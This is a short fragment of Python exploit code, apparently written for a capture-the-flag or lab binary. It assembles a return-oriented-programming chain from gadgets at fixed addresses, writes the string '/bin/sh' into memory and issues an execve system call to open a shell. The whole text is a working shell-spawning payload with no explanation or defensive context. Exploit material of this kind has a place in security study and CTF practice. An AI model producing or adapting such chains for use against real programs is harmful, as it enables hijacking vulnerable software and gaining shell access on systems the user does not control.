payload = p64(0x408913)
#0x0000000000408913: pop rdi; ret; 
payload += p64(0x459068)+p64(0x409869)
# 0x0000000000409869: pop rsi; ret; 
payload += p64(0x68662f6e69622f)+p64(0x42f4ba)
# 0x000000000042f4ba: mov qword ptr [rdi + 8], rsi; ret; 
payload += p64(0x431ed0)
# 0x0000000000431ed0: cmp dl, 0xfc; mov edx, 0; cmovne eax, edx; ret; 
payload += p64(0x408913)
# 0x0000000000408913: pop rdi; ret; 
payload += p64(0x459070)+p64(0x409869)
# 0x0000000000409869: pop rsi; ret; 
payload += p64(0x0)+p64(0x40942c)
# 0x000000000040942c: pop rbx; ret; 
payload += p64(0x45920b)+p64(0x421658)
# 0x0000000000421658: pop rax; add al, 0; add byte ptr [rbx + 0x5d], bl; pop r12; pop r13; ret; 
payload += p64(0x3b)+p64(0x0)+p64(0x0)+p64(0x4029fb)
# 0x00000000004029fb: syscall; 
payload += b''
